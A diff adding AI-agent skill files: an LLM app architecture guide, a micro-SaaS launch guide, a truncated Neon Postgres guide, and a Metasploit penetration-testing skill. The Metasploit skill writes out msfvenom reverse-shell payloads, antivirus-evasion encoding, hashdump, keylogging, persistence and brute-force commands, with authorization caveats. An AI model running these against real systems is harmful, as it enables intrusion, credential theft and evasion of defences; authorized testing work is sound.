span.set_attribute("response.length", len(response))
|
||||
span.set_attribute("tokens.total", response.usage.total_tokens)
|
||||
|
||||
return response.content
|
||||
```
|
||||
|
||||
### 4.3 Evaluation Framework
|
||||
|
||||
```python
|
||||
class LLMEvaluator:
|
||||
"""
|
||||
Evaluate LLM outputs for quality
|
||||
"""
|
||||
|
||||
def evaluate_response(self,
|
||||
question: str,
|
||||
response: str,
|
||||
ground_truth: str = None) -> dict:
|
||||
scores = {}
|
||||
|
||||
# Relevance: Does it answer the question?
|
||||
scores["relevance"] = self._score_relevance(question, response)
|
||||
|
||||
# Coherence: Is it well-structured?
|
||||
scores["coherence"] = self._score_coherence(response)
|
||||
|
||||
# Groundedness: Is it based on provided context?
|
||||
scores["groundedness"] = self._score_groundedness(response)
|
||||
|
||||
# Accuracy: Does it match ground truth?
|
||||
if ground_truth:
|
||||
scores["accuracy"] = self._score_accuracy(response, ground_truth)
|
||||
|
||||
# Harmfulness: Is it safe?
|
||||
scores["safety"] = self._score_safety(response)
|
||||
|
||||
return scores
|
||||
|
||||
def run_benchmark(self, test_cases: list[dict]) -> dict:
|
||||
"""Run evaluation on test set"""
|
||||
results = []
|
||||
for case in test_cases:
|
||||
response = llm.generate(case["prompt"])
|
||||
scores = self.evaluate_response(
|
||||
question=case["prompt"],
|
||||
response=response,
|
||||
ground_truth=case.get("expected")
|
||||
)
|
||||
results.append(scores)
|
||||
|
||||
return self._aggregate_scores(results)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 5. Production Patterns
|
||||
|
||||
### 5.1 Caching Strategy
|
||||
|
||||
```python
|
||||
import hashlib
|
||||
from functools import lru_cache
|
||||
|
||||
class LLMCache:
|
||||
def __init__(self, redis_client, ttl_seconds=3600):
|
||||
self.redis = redis_client
|
||||
self.ttl = ttl_seconds
|
||||
|
||||
def _cache_key(self, prompt: str, model: str, **kwargs) -> str:
|
||||
"""Generate deterministic cache key"""
|
||||
content = f"{model}:{prompt}:{json.dumps(kwargs, sort_keys=True)}"
|
||||
return hashlib.sha256(content.encode()).hexdigest()
|
||||
|
||||
def get_or_generate(self, prompt: str, model: str, **kwargs) -> str:
|
||||
key = self._cache_key(prompt, model, **kwargs)
|
||||
|
||||
# Check cache
|
||||
cached = self.redis.get(key)
|
||||
if cached:
|
||||
return cached.decode()
|
||||
|
||||
# Generate
|
||||
response = llm.generate(prompt, model=model, **kwargs)
|
||||
|
||||
# Cache (only cache deterministic outputs)
|
||||
if kwargs.get("temperature", 1.0) == 0:
|
||||
self.redis.setex(key, self.ttl, response)
|
||||
|
||||
return response
|
||||
```
|
||||
|
||||
### 5.2 Rate Limiting & Retry
|
||||
|
||||
```python
|
||||
import time
|
||||
from tenacity import retry, wait_exponential, stop_after_attempt
|
||||
|
||||
class RateLimiter:
|
||||
def __init__(self, requests_per_minute: int):
|
||||
self.rpm = requests_per_minute
|
||||
self.timestamps = []
|
||||
|
||||
def acquire(self):
|
||||
"""Wait if rate limit would be exceeded"""
|
||||
now = time.time()
|
||||
|
||||
# Remove old timestamps
|
||||
self.timestamps = [t for t in self.timestamps if now - t < 60]
|
||||
|
||||
if len(self.timestamps) >= self.rpm:
|
||||
sleep_time = 60 - (now - self.timestamps[0])
|
||||
time.sleep(sleep_time)
|
||||
|
||||
self.timestamps.append(time.time())
|
||||
|
||||
# Retry with exponential backoff
|
||||
@retry(
|
||||
wait=wait_exponential(multiplier=1, min=4, max=60),
|
||||
stop=stop_after_attempt(5)
|
||||
)
|
||||
def call_llm_with_retry(prompt: str) -> str:
|
||||
try:
|
||||
return llm.generate(prompt)
|
||||
except RateLimitError:
|
||||
raise # Will trigger retry
|
||||
except APIError as e:
|
||||
if e.status_code >= 500:
|
||||
raise # Retry server errors
|
||||
raise # Don't retry client errors
|
||||
```
|
||||
|
||||
### 5.3 Fallback Strategy
|
||||
|
||||
```python
|
||||
class LLMWithFallback:
|
||||
def __init__(self, primary: str, fallbacks: list[str]):
|
||||
self.primary = primary
|
||||
self.fallbacks = fallbacks
|
||||
|
||||
def generate(self, prompt: str, **kwargs) -> str:
|
||||
models = [self.primary] + self.fallbacks
|
||||
|
||||
for model in models:
|
||||
try:
|
||||
return llm.generate(prompt, model=model, **kwargs)
|
||||
except (RateLimitError, APIError) as e:
|
||||
logging.warning(f"Model {model} failed: {e}")
|
||||
continue
|
||||
|
||||
raise AllModelsFailedError("All models exhausted")
|
||||
|
||||
# Usage
|
||||
llm_client = LLMWithFallback(
|
||||
primary="gpt-4-turbo",
|
||||
fallbacks=["gpt-3.5-turbo", "claude-3-sonnet"]
|
||||
)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Architecture Decision Matrix
|
||||
|
||||
| Pattern | Use When | Complexity | Cost |
|
||||
| :------------------- | :--------------- | :--------- | :-------- |
|
||||
| **Simple RAG** | FAQ, docs search | Low | Low |
|
||||
| **Hybrid RAG** | Mixed queries | Medium | Medium |
|
||||
| **ReAct Agent** | Multi-step tasks | Medium | Medium |
|
||||
| **Function Calling** | Structured tools | Low | Low |
|
||||
| **Plan-Execute** | Complex tasks | High | High |
|
||||
| **Multi-Agent** | Research tasks | Very High | Very High |
|
||||
|
||||
---
|
||||
|
||||
## Resources
|
||||
|
||||
- [Dify Platform](https://github.com/langgenius/dify)
|
||||
- [LangChain Docs](https://python.langchain.com/)
|
||||
- [LlamaIndex](https://www.llamaindex.ai/)
|
||||
- [Anthropic Cookbook](https://github.com/anthropics/anthropic-cookbook)
|
||||
475
skills/metasploit-framework/SKILL.md
Normal file
475
skills/metasploit-framework/SKILL.md
Normal file
@@ -0,0 +1,475 @@
|
||||
---
|
||||
name: Metasploit Framework
|
||||
description: This skill should be used when the user asks to "use Metasploit for penetration testing", "exploit vulnerabilities with msfconsole", "create payloads with msfvenom", "perform post-exploitation", "use auxiliary modules for scanning", or "develop custom exploits". It provides comprehensive guidance for leveraging the Metasploit Framework in security assessments.
|
||||
---
|
||||
|
||||
# Metasploit Framework
|
||||
|
||||
## Purpose
|
||||
|
||||
Leverage the Metasploit Framework for comprehensive penetration testing, from initial exploitation through post-exploitation activities. Metasploit provides a unified platform for vulnerability exploitation, payload generation, auxiliary scanning, and maintaining access to compromised systems during authorized security assessments.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
### Required Tools
|
||||
```bash
|
||||
# Metasploit comes pre-installed on Kali Linux
|
||||
# For other systems:
|
||||
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
|
||||
chmod 755 msfinstall
|
||||
./msfinstall
|
||||
|
||||
# Start PostgreSQL for database support
|
||||
sudo systemctl start postgresql
|
||||
sudo msfdb init
|
||||
```
|
||||
|
||||
### Required Knowledge
|
||||
- Network and system fundamentals
|
||||
- Understanding of vulnerabilities and exploits
|
||||
- Basic programming concepts
|
||||
- Target enumeration techniques
|
||||
|
||||
### Required Access
|
||||
- Written authorization for testing
|
||||
- Network access to target systems
|
||||
- Understanding of scope and rules of engagement
|
||||
|
||||
## Outputs and Deliverables
|
||||
|
||||
1. **Exploitation Evidence** - Screenshots and logs of successful compromises
|
||||
2. **Session Logs** - Command history and extracted data
|
||||
3. **Vulnerability Mapping** - Exploited vulnerabilities with CVE references
|
||||
4. **Post-Exploitation Artifacts** - Credentials, files, and system information
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Phase 1: MSFConsole Basics
|
||||
|
||||
Launch and navigate the Metasploit console:
|
||||
|
||||
```bash
|
||||
# Start msfconsole
|
||||
msfconsole
|
||||
|
||||
# Quiet mode (skip banner)
|
||||
msfconsole -q
|
||||
|
||||
# Basic navigation commands
|
||||
msf6 > help # Show all commands
|
||||
msf6 > search [term] # Search modules
|
||||
msf6 > use [module] # Select module
|
||||
msf6 > info # Show module details
|
||||
msf6 > show options # Display required options
|
||||
msf6 > set [OPTION] [value] # Configure option
|
||||
msf6 > run / exploit # Execute module
|
||||
msf6 > back # Return to main console
|
||||
msf6 > exit # Exit msfconsole
|
||||
```
|
||||
|
||||
### Phase 2: Module Types
|
||||
|
||||
Understand the different module categories:
|
||||
|
||||
```bash
|
||||
# 1. Exploit Modules - Target specific vulnerabilities
|
||||
msf6 > show exploits
|
||||
msf6 > use exploit/windows/smb/ms17_010_eternalblue
|
||||
|
||||
# 2. Payload Modules - Code executed after exploitation
|
||||
msf6 > show payloads
|
||||
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
||||
|
||||
# 3. Auxiliary Modules - Scanning, fuzzing, enumeration
|
||||
msf6 > show auxiliary
|
||||
msf6 > use auxiliary/scanner/smb/smb_version
|
||||
|
||||
# 4. Post-Exploitation Modules - Actions after compromise
|
||||
msf6 > show post
|
||||
msf6 > use post/windows/gather/hashdump
|
||||
|
||||
# 5. Encoders - Obfuscate payloads
|
||||
msf6 > show encoders
|
||||
msf6 > set ENCODER x86/shikata_ga_nai
|
||||
|
||||
# 6. Nops - No-operation padding for buffer overflows
|
||||
msf6 > show nops
|
||||
|
||||
# 7. Evasion - Bypass security controls
|
||||
msf6 > show evasion
|
||||
```
|
||||
|
||||
### Phase 3: Searching for Modules
|
||||
|
||||
Find appropriate modules for targets:
|
||||
|
||||
```bash
|
||||
# Search by name
|
||||
msf6 > search eternalblue
|
||||
|
||||
# Search by CVE
|
||||
msf6 > search cve:2017-0144
|
||||
|
||||
# Search by platform
|
||||
msf6 > search platform:windows type:exploit
|
||||
|
||||
# Search by type and keyword
|
||||
msf6 > search type:auxiliary smb
|
||||
|
||||
# Filter by rank (excellent, great, good, normal, average, low, manual)
|
||||
msf6 > search rank:excellent
|
||||
|
||||
# Combined search
|
||||
msf6 > search type:exploit platform:linux apache
|
||||
|
||||
# View search results columns:
|
||||
# Name, Disclosure Date, Rank, Check (if it can verify vulnerability), Description
|
||||
```
|
||||
|
||||
### Phase 4: Configuring Exploits
|
||||
|
||||
Set up an exploit for execution:
|
||||
|
||||
```bash
|
||||
# Select exploit module
|
||||
msf6 > use exploit/windows/smb/ms17_010_eternalblue
|
||||
|
||||
# View required options
|
||||
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
|
||||
|
||||
# Set target host
|
||||
msf6 exploit(...) > set RHOSTS 192.168.1.100
|
||||
|
||||
# Set target port (if different from default)
|
||||
msf6 exploit(...) > set RPORT 445
|
||||
|
||||
# View compatible payloads
|
||||
msf6 exploit(...) > show payloads
|
||||
|
||||
# Set payload
|
||||
msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
||||
|
||||
# Set local host for reverse connection
|
||||
msf6 exploit(...) > set LHOST 192.168.1.50
|
||||
msf6 exploit(...) > set LPORT 4444
|
||||
|
||||
# View all options again to verify
|
||||
msf6 exploit(...) > show options
|
||||
|
||||
# Check if target is vulnerable (if supported)
|
||||
msf6 exploit(...) > check
|
||||
|
||||
# Execute exploit
|
||||
msf6 exploit(...) > exploit
|
||||
# or
|
||||
msf6 exploit(...) > run
|
||||
```
|
||||
|
||||
### Phase 5: Payload Types
|
||||
|
||||
Select appropriate payload for the situation:
|
||||
|
||||
```bash
|
||||
# Singles - Self-contained, no staging
|
||||
windows/shell_reverse_tcp
|
||||
linux/x86/shell_bind_tcp
|
||||
|
||||
# Stagers - Small payload that downloads larger stage
|
||||
windows/meterpreter/reverse_tcp
|
||||
linux/x86/meterpreter/bind_tcp
|
||||
|
||||
# Stages - Downloaded by stager, provides full functionality
|
||||
# Meterpreter, VNC, shell
|
||||
|
||||
# Payload naming convention:
|
||||
# [platform]/[architecture]/[payload_type]/[connection_type]
|
||||
# Examples:
|
||||
windows/x64/meterpreter/reverse_tcp
|
||||
linux/x86/shell/bind_tcp
|
||||
php/meterpreter/reverse_tcp
|
||||
java/meterpreter/reverse_https
|
||||
android/meterpreter/reverse_tcp
|
||||
```
|
||||
|
||||
### Phase 6: Meterpreter Session
|
||||
|
||||
Work with Meterpreter post-exploitation:
|
||||
|
||||
```bash
|
||||
# After successful exploitation, you get Meterpreter prompt
|
||||
meterpreter >
|
||||
|
||||
# System Information
|
||||
meterpreter > sysinfo
|
||||
meterpreter > getuid
|
||||
meterpreter > getpid
|
||||
|
||||
# File System Operations
|
||||
meterpreter > pwd
|
||||
meterpreter > ls
|
||||
meterpreter > cd C:\\Users
|
||||
meterpreter > download file.txt /tmp/
|
||||
meterpreter > upload /tmp/tool.exe C:\\
|
||||
|
||||
# Process Management
|
||||
meterpreter > ps
|
||||
meterpreter > migrate [PID]
|
||||
meterpreter > kill [PID]
|
||||
|
||||
# Networking
|
||||
meterpreter > ipconfig
|
||||
meterpreter > netstat
|
||||
meterpreter > route
|
||||
meterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.1
|
||||
|
||||
# Privilege Escalation
|
||||
meterpreter > getsystem
|
||||
meterpreter > getprivs
|
||||
|
||||
# Credential Harvesting
|
||||
meterpreter > hashdump
|
||||
meterpreter > run post/windows/gather/credentials/credential_collector
|
||||
|
||||
# Screenshots and Keylogging
|
||||
meterpreter > screenshot
|
||||
meterpreter > keyscan_start
|
||||
meterpreter > keyscan_dump
|
||||
meterpreter > keyscan_stop
|
||||
|
||||
# Shell Access
|
||||
meterpreter > shell
|
||||
C:\Windows\system32> whoami
|
||||
C:\Windows\system32> exit
|
||||
meterpreter >
|
||||
|
||||
# Background Session
|
||||
meterpreter > background
|
||||
msf6 exploit(...) > sessions -l
|
||||
msf6 exploit(...) > sessions -i 1
|
||||
```
|
||||
|
||||
### Phase 7: Auxiliary Modules
|
||||
|
||||
Use auxiliary modules for reconnaissance:
|
||||
|
||||
```bash
|
||||
# SMB Version Scanner
|
||||
msf6 > use auxiliary/scanner/smb/smb_version
|
||||
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.0/24
|
||||
msf6 auxiliary(...) > run
|
||||
|
||||
# Port Scanner
|
||||
msf6 > use auxiliary/scanner/portscan/tcp
|
||||
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
|
||||
msf6 auxiliary(...) > set PORTS 1-1000
|
||||
msf6 auxiliary(...) > run
|
||||
|
||||
# SSH Version Scanner
|
||||
msf6 > use auxiliary/scanner/ssh/ssh_version
|
||||
msf6 auxiliary(...) > set RHOSTS 192.168.1.0/24
|
||||
msf6 auxiliary(...) > run
|
||||
|
||||
# FTP Anonymous Login
|
||||
msf6 > use auxiliary/scanner/ftp/anonymous
|
||||
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
|
||||
msf6 auxiliary(...) > run
|
||||
|
||||
# HTTP Directory Scanner
|
||||
msf6 > use auxiliary/scanner/http/dir_scanner
|
||||
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
|
||||
msf6 auxiliary(...) > run
|
||||
|
||||
# Brute Force Modules
|
||||
msf6 > use auxiliary/scanner/ssh/ssh_login
|
||||
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
|
||||
msf6 auxiliary(...) > set USER_FILE /usr/share/wordlists/users.txt
|
||||
msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
|
||||
msf6 auxiliary(...) > run
|
||||
```
|
||||
|
||||
### Phase 8: Post-Exploitation Modules
|
||||
|
||||
Run post modules on active sessions:
|
||||
|
||||
```bash
|
||||
# List sessions
|
||||
msf6 > sessions -l
|
||||
|
||||
# Run post module on specific session
|
||||
msf6 > use post/windows/gather/hashdump
|
||||
msf6 post(windows/gather/hashdump) > set SESSION 1
|
||||
msf6 post(...) > run
|
||||
|
||||
# Or run directly from Meterpreter
|
||||
meterpreter > run post/windows/gather/hashdump
|
||||
|
||||
# Common Post Modules
|
||||
# Credential Gathering
|
||||
post/windows/gather/credentials/credential_collector
|
||||
post/windows/gather/lsa_secrets
|
||||
post/windows/gather/cachedump
|
||||
post/multi/gather/ssh_creds
|
||||
|
||||
# System Enumeration
|
||||
post/windows/gather/enum_applications
|
||||
post/windows/gather/enum_logged_on_users
|
||||
post/windows/gather/enum_shares
|
||||
post/linux/gather/enum_configs
|
||||
|
||||
# Privilege Escalation
|
||||
post/windows/escalate/getsystem
|
||||
post/multi/recon/local_exploit_suggester
|
||||
|
||||
# Persistence
|
||||
post/windows/manage/persistence_exe
|
||||
post/linux/manage/sshkey_persistence
|
||||
|
||||
# Pivoting
|
||||
post/multi/manage/autoroute
|
||||
```
|
||||
|
||||
### Phase 9: Payload Generation with msfvenom
|
||||
|
||||
Create standalone payloads:
|
||||
|
||||
```bash
|
||||
# Basic Windows reverse shell
|
||||
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe
|
||||
|
||||
# Linux reverse shell
|
||||
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf
|
||||
|
||||
# PHP reverse shell
|
||||
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php
|
||||
|
||||
# Python reverse shell
|
||||
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.py
|
||||
|
||||
# PowerShell payload
|
||||
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f psh -o shell.ps1
|
||||
|
||||
# ASP web shell
|
||||
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o shell.asp
|
||||
|
||||
# WAR file (Tomcat)
|
||||
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o shell.war
|
||||
|
||||
# Android APK
|
||||
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o shell.apk
|
||||
|
||||
# Encoded payload (evade AV)
|
||||
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe
|
||||
|
||||
# List available formats
|
||||
msfvenom --list formats
|
||||
|
||||
# List available encoders
|
||||
msfvenom --list encoders
|
||||
```
|
||||
|
||||
### Phase 10: Setting Up Handlers
|
||||
|
||||
Configure listener for incoming connections:
|
||||
|
||||
```bash
|
||||
# Manual handler setup
|
||||
msf6 > use exploit/multi/handler
|
||||
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(multi/handler) > set LHOST 192.168.1.50
|
||||
msf6 exploit(multi/handler) > set LPORT 4444
|
||||
msf6 exploit(multi/handler) > exploit -j
|
||||
|
||||
# The -j flag runs as background job
|
||||
msf6 > jobs -l
|
||||
|
||||
# When payload executes on target, session opens
|
||||
[*] Meterpreter session 1 opened
|
||||
|
||||
# Interact with session
|
||||
msf6 > sessions -i 1
|
||||
```
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### Essential MSFConsole Commands
|
||||
|
||||
| Command | Description |
|
||||
|---------|-------------|
|
||||
| `search [term]` | Search for modules |
|
||||
| `use [module]` | Select a module |
|
||||
| `info` | Display module information |
|
||||
| `show options` | Show configurable options |
|
||||
| `set [OPT] [val]` | Set option value |
|
||||
| `setg [OPT] [val]` | Set global option |
|
||||
| `run` / `exploit` | Execute module |
|
||||
| `check` | Verify target vulnerability |
|
||||
| `back` | Deselect module |
|
||||
| `sessions -l` | List active sessions |
|
||||
| `sessions -i [N]` | Interact with session |
|
||||
| `jobs -l` | List background jobs |
|
||||
| `db_nmap` | Run nmap with database |
|
||||
|
||||
### Meterpreter Essential Commands
|
||||
|
||||
| Command | Description |
|
||||
|---------|-------------|
|
||||
| `sysinfo` | System information |
|
||||
| `getuid` | Current user |
|
||||
| `getsystem` | Attempt privilege escalation |
|
||||
| `hashdump` | Dump password hashes |
|
||||
| `shell` | Drop to system shell |
|
||||
| `upload/download` | File transfer |
|
||||
| `screenshot` | Capture screen |
|
||||
| `keyscan_start` | Start keylogger |
|
||||
| `migrate [PID]` | Move to another process |
|
||||
| `background` | Background session |
|
||||
| `portfwd` | Port forwarding |
|
||||
|
||||
### Common Exploit Modules
|
||||
|
||||
```bash
|
||||
# Windows
|
||||
exploit/windows/smb/ms17_010_eternalblue
|
||||
exploit/windows/smb/ms08_067_netapi
|
||||
exploit/windows/http/iis_webdav_upload_asp
|
||||
exploit/windows/local/bypassuac
|
||||
|
||||
# Linux
|
||||
exploit/linux/ssh/sshexec
|
||||
exploit/linux/local/overlayfs_priv_esc
|
||||
exploit/multi/http/apache_mod_cgi_bash_env_exec
|
||||
|
||||
# Web Applications
|
||||
exploit/multi/http/tomcat_mgr_upload
|
||||
exploit/unix/webapp/wp_admin_shell_upload
|
||||
exploit/multi/http/jenkins_script_console
|
||||
```
|
||||
|
||||
## Constraints and Limitations
|
||||
|
||||
### Legal Requirements
|
||||
- Only use on systems you own or have written authorization to test
|
||||
- Document all testing activities
|
||||
- Follow rules of engagement
|
||||
- Report all findings to appropriate parties
|
||||
|
||||
### Technical Limitations
|
||||
- Modern AV/EDR may detect Metasploit payloads
|
||||
- Some exploits require specific target configurations
|
||||
- Firewall rules may block reverse connections
|
||||
- Not all exploits work on all target versions
|
||||
|
||||
### Operational Security
|
||||
- Use encrypted channels (reverse_https) when possible
|
||||
- Clean up artifacts after testing
|
||||
- Avoid detection by monitoring systems
|
||||
- Limit post-exploitation to agreed scope
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Issue | Solutions |
|
||||
|-------|-----------|
|
||||
| Database not connected | Run `sudo msfdb init`, start PostgreSQL, then `db_connect` |
|
||||
| Exploit fails/no session | Run `check`; verify payload architecture; check firewall; try different payloads |
|
||||
| Session dies immediately | Migrate to stable process; use stageless payload; check AV; use AutoRunScript |
|
||||
| Payload detected by AV | Use encoding `-e x86/shikata_ga_nai -i 10`; use evasion modules; custom templates |
|
||||
212
skills/micro-saas-launcher/SKILL.md
Normal file
212
skills/micro-saas-launcher/SKILL.md
Normal file
@@ -0,0 +1,212 @@
|
||||
---
|
||||
name: micro-saas-launcher
|
||||
description: "Expert in launching small, focused SaaS products fast - the indie hacker approach to building profitable software. Covers idea validation, MVP development, pricing, launch strategies, and growing to sustainable revenue. Ship in weeks, not months. Use when: micro saas, indie hacker, small saas, side project, saas mvp."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Micro-SaaS Launcher
|
||||
|
||||
**Role**: Micro-SaaS Launch Architect
|
||||
|
||||
You ship fast and iterate. You know the difference between a side project
|
||||
and a business. You've seen what works in the indie hacker community. You
|
||||
help people go from idea to paying customers in weeks, not years. You
|
||||
focus on sustainable, profitable businesses - not unicorn hunting.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Micro-SaaS strategy
|
||||
- MVP scoping
|
||||
- Pricing strategies
|
||||
- Launch playbooks
|
||||
- Indie hacker patterns
|
||||
- Solo founder tech stack
|
||||
- Early traction
|
||||
- SaaS metrics
|
||||
|
||||
## Patterns
|
||||
|
||||
### Idea Validation
|
||||
|
||||
Validating before building
|
||||
|
||||
**When to use**: When starting a micro-SaaS
|
||||
|
||||
```javascript
|
||||
## Idea Validation
|
||||
|
||||
### The Validation Framework
|
||||
| Question | How to Answer |
|
||||
|----------|---------------|
|
||||
| Problem exists? | Talk to 5+ potential users |
|
||||
| People pay? | Pre-sell or find competitors |
|
||||
| You can build? | Can MVP ship in 2 weeks? |
|
||||
| You can reach them? | Distribution channel exists? |
|
||||
|
||||
### Quick Validation Methods
|
||||
1. **Landing page test**
|
||||
- Build landing page
|
||||
- Drive traffic (ads, community)
|
||||
- Measure signups/interest
|
||||
|
||||
2. **Pre-sale**
|
||||
- Sell before building
|
||||
- "Join waitlist for 50% off"
|
||||
- If no sales, pivot
|
||||
|
||||
3. **Competitor check**
|
||||
- Competitors = validation
|
||||
- No competitors = maybe no market
|
||||
- Find gap you can fill
|
||||
|
||||
### Red Flags
|
||||
- "Everyone needs this" (too broad)
|
||||
- No clear buyer (who pays?)
|
||||
- Requires marketplace dynamics
|
||||
- Needs massive scale to work
|
||||
|
||||
### Green Flags
|
||||
- Clear, specific pain point
|
||||
- People already paying for alternatives
|
||||
- You have domain expertise
|
||||
- Distribution channel access
|
||||
```
|
||||
|
||||
### MVP Speed Run
|
||||
|
||||
Ship MVP in 2 weeks
|
||||
|
||||
**When to use**: When building first version
|
||||
|
||||
```javascript
|
||||
## MVP Speed Run
|
||||
|
||||
### The Stack (Solo-Founder Optimized)
|
||||
| Component | Choice | Why |
|
||||
|-----------|--------|-----|
|
||||
| Frontend | Next.js | Full-stack, Vercel deploy |
|
||||
| Backend | Next.js API / Supabase | Fast, scalable |
|
||||
| Database | Supabase Postgres | Free tier, auth included |
|
||||
| Auth | Supabase / Clerk | Don't build auth |
|
||||
| Payments | Stripe | Industry standard |
|
||||
| Email | Resend / Loops | Transactional + marketing |
|
||||
| Hosting | Vercel | Free tier generous |
|
||||
|
||||
### Week 1: Core
|
||||
```
|
||||
Day 1-2: Auth + basic UI
|
||||
Day 3-4: Core feature (one thing)
|
||||
Day 5-6: Stripe integration
|
||||
Day 7: Polish and bug fixes
|
||||
```
|
||||
|
||||
### Week 2: Launch Ready
|
||||
```
|
||||
Day 1-2: Landing page
|
||||
Day 3: Email flows (welcome, etc.)
|
||||
Day 4: Legal (privacy, terms)
|
||||
Day 5: Final testing
|
||||
Day 6-7: Soft launch
|
||||
```
|
||||
|
||||
### What to Skip in MVP
|
||||
- Perfect design (good enough is fine)
|
||||
- All features (one core feature only)
|
||||
- Scale optimization (worry later)
|
||||
- Custom auth (use a service)
|
||||
- Multiple pricing tiers (start simple)
|
||||
```
|
||||
|
||||
### Pricing Strategy
|
||||
|
||||
Pricing your micro-SaaS
|
||||
|
||||
**When to use**: When setting prices
|
||||
|
||||
```javascript
|
||||
## Pricing Strategy
|
||||
|
||||
### Pricing Tiers for Micro-SaaS
|
||||
| Strategy | Best For |
|
||||
|----------|----------|
|
||||
| Single price | Simple tools, clear value |
|
||||
| Two tiers | Free/paid or Basic/Pro |
|
||||
| Three tiers | Most SaaS (Good/Better/Best) |
|
||||
| Usage-based | API products, variable use |
|
||||
|
||||
### Starting Price Framework
|
||||
```
|
||||
What's the alternative cost? (Competitor or manual work)
|
||||
Your price = 20-50% of alternative cost
|
||||
|
||||
Example:
|
||||
- Manual work takes 10 hours/month
|
||||
- 10 hours × $50/hour = $500 value
|
||||
- Price: $49-99/month
|
||||
```
|
||||
|
||||
### Common Micro-SaaS Prices
|
||||
| Type | Price Range |
|
||||
|------|-------------|
|
||||
| Simple tool | $9-29/month |
|
||||
| Pro tool | $29-99/month |
|
||||
| B2B tool | $49-299/month |
|
||||
| Lifetime deal | 3-5x monthly |
|
||||
|
||||
### Pricing Mistakes
|
||||
- Too cheap (undervalues, attracts bad customers)
|
||||
- Too complex (confuses buyers)
|
||||
- No free tier AND no trial (no way to try)
|
||||
- Charging too late (validate with money early)
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Building in Secret
|
||||
|
||||
**Why bad**: No feedback loop.
|
||||
Building wrong thing.
|
||||
Wasted time.
|
||||
Fear of shipping.
|
||||
|
||||
**Instead**: Launch ugly MVP.
|
||||
Get feedback early.
|
||||
Build in public.
|
||||
Iterate based on users.
|
||||
|
||||
### ❌ Feature Creep
|
||||
|
||||
**Why bad**: Never ships.
|
||||
Dilutes focus.
|
||||
Confuses users.
|
||||
Delays revenue.
|
||||
|
||||
**Instead**: One core feature first.
|
||||
Ship, then iterate.
|
||||
Let users tell you what's missing.
|
||||
Say no to most requests.
|
||||
|
||||
### ❌ Pricing Too Low
|
||||
|
||||
**Why bad**: Undervalues your work.
|
||||
Attracts price-sensitive customers.
|
||||
Hard to run a business.
|
||||
Can't afford growth.
|
||||
|
||||
**Instead**: Price for value, not time.
|
||||
Start higher, discount if needed.
|
||||
B2B can pay more.
|
||||
Your time has value.
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Great product, no way to reach customers | high | ## Distribution First |
|
||||
| Building for market that can't/won't pay | high | ## Market Selection |
|
||||
| New signups leaving as fast as they come | high | ## Fixing Churn |
|
||||
| Pricing page confuses potential customers | medium | ## Simple Pricing |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `landing-page-design`, `backend`, `stripe`, `seo`
|
||||
56
skills/neon-postgres/SKILL.md
Normal file
56
skills/neon-postgres/SKILL.md
Normal file
@@ -0,0 +1,56 @@
|
||||
---
|
||||
name: neon-postgres
|
||||
description: "Expert patterns for Neon serverless Postgres, branching, connection pooling, and Prisma/Drizzle integration Use when: neon database, serverless postgres, database branching, neon postgres, postgres serverless."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Neon Postgres
|
||||
|
||||
## Patterns
|
||||
|
||||
### Prisma with Neon Connection
|
||||
|
||||
Configure Prisma for Neon with connection pooling.
|
||||
|
||||
Use two connection strings:
|
||||
- DATABASE_URL: Pooled connection for Prisma Client
|
||||
- DIRECT_URL: Direct connection for Prisma Migrate
|
||||
|
||||
The pooled connection uses PgBouncer for up to 10K connections.
|
||||
Direct connection required for migrations (DDL operations).
|
||||
|
||||
|
||||
### Drizzle with Neon Serverless Driver
|
||||
|
||||
Use Drizzle ORM with Neon's serverless HTTP driver for
|
||||
edge/serverless environments.
|
||||
|
||||
Two driver options:
|
||||
- neon-http: Single queries over HTTP (fastest for one-off queries)
|
||||
- neon-serverless: WebSocket for transactions and sessions
|
||||
|
||||
|
||||
### Connection Pooling with PgBouncer
|
||||
|
||||
Neon provides built-in connection pooling via PgBouncer.
|
||||
|
||||
Key limits:
|
||||
- Up to 10,000 concurrent connections to pooler
|
||||
- Connections still consume underlying Postgres connections
